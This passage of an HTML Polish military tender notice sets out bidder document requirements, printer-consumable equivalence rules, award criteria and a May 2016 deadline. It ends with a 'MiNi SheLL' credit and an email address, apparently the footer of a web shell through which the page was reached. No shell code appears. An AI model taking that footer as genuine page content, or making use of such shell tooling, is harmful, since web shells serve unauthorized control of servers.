<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony i podpisany Formularz ofertowy i cenowy z wykorzystaniem wzoru
                   zamieszczonego  w  niniejszej SIWZ - Załącznik nr 1 oraz  nr 2 do SIWZ;

2.	Oświadczenie Wykonawcy, że w przypadku wyboru jego oferty jako najkorzystniejszej i podpisania umowy, zobowiązuje się on  do dostarczenia wyrobów oznakowanych kodem kreskowym zgodnie z Decyzją nr 3/MON Ministra Obrony Narodowej z dnia 3 stycznia 2014 r. w sprawie wytycznych określających wymagania w zakresie znakowania kodem  kreskowym wyrobów dostarczanych do resortu obrony narodowej (Załącznik nr 7 do SIWZ). Dostarczone wyroby powinny być oznakowane zgodnie z 4 pkt.1 ppkt.5 (grupa materiałowa 5) ww. decyzji. 
                Zastosowane etykiety powinny spełniać wymagania określone w 5 dla grupy 
                materiałowej 5 ww. decyzji. 
3.	Oświadczenie dotyczące obowiązku podatkowego - Załącznik nr 10 do SIWZ;
4.	Oświadczenie o posiadaniu wpisu do rejestru właściwego starosty (Ustawa o odpadach  
 z dn. 14.12.2012r. Dz.U. z 2013r., poz. 21) - Załącznik nr 11 do SIWZ.

5.	W przypadku, gdy Wykonawca oferuje równoważne materiały eksploatacyjne Zamawiający żąda złożenia:

1. certyfikatów potwierdzających, że oferowane materiały eksploatacyjne równoważne są
     	projektowane, produkowane i dystrybuowane pod nadzorem   zintegrowanego systemu
    	zarządzania jakością i zgodnie z wymogami norm ISO 9001:2008 i  systemem zarządzania
   	 środowiskowego zgodnie z wymogami norm ISO 14001:2004 lub normami równoważnym;
		2. raportów z testów wydajności zgodnie z normami:
- ISO/IEC 19752 i ISO/IEC 19798 (odpowiednio dla kaset z tonerem do drukarek 
             monochromatycznych i kolorowych), 
- ISO/IEC 24711 (dla wkładów atramentowych)
lub norm równoważnych.
Raporty te muszą być sporządzone w  języku polskim oraz muszą zawierać wszystkie informacje wymagane przez wskazane normy.

		3. dla materiałów, które nie podlegają w/w normom - deklaracji zgodności oferowanego 
     	produktu z produktem wytwarzanym przez producenta sprzętu, dla którego przeznaczony 
     	jest dany produkt pod względem zachowania podstawowych parametrów przewidzianych 
    	 dla tego sprzętu.

Dla celów umożliwienia weryfikacji do jakiej pozycji Formularza cenowego odnosi się przedłożony raport z testów wydajności/deklaracja zgodności, Wykonawca zobowiązany jest zamieścić w prawym górnym rogu tego dokumentu  oznaczenie pozycji z Formularza cenowego, której dokument dotyczy.

 		4. w przypadku, gdy producentem produktu równoważnego jest producent produktu 
     	odniesienia-produktu oryginalnego - dokumentem potwierdzającym wydajność może być 
     	wydruk ze strony internetowej producenta  (poświadczony za zgodność kopii dokumentu 
    	 z oryginałem przez Wykonawcę). 

5. oświadczenie Wykonawcy, że oferowane produkty równoważne są wyrobami fabrycznie
     	nowymi, nieregenerowanymi, w pełni kompatybilnymi ze sprzętem, do którego są
    	 przeznaczone, o parametrach takich samych w stosunku do typu zamawianego produktu
    	stanowiącego przedmiot zamówienia oraz że proces produkcji i stosowanie
    	 wyprodukowanych przez niego materiałów eksploatacyjnych nie narusza praw
     	patentowych producentów oryginalnych tonerów, tuszy i kaset, jak również że użycie tego
     	produktu do serwisowanych w ramach gwarancji urządzeń nie spowoduje uszkodzenia
     	naruszającego warunki gwarancji (wg wzoru Załącznik nr 8 do SIWZ).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - termin dostawy - 30</li>
<li>3 - termin reklamacji wymiany wadliwych materiałów na nowe - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.45wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 45 Wojskowy Oddział Gospodarczy; 69-211 Wędrzyn; bud. nr 33 pok. nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2016 godzina 09:45, miejsce: 45 Wojskowy Oddział Gospodarczy; 69-211 Wędrzyn; bud. nr 33 pok. nr 211- Kancelaria Jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com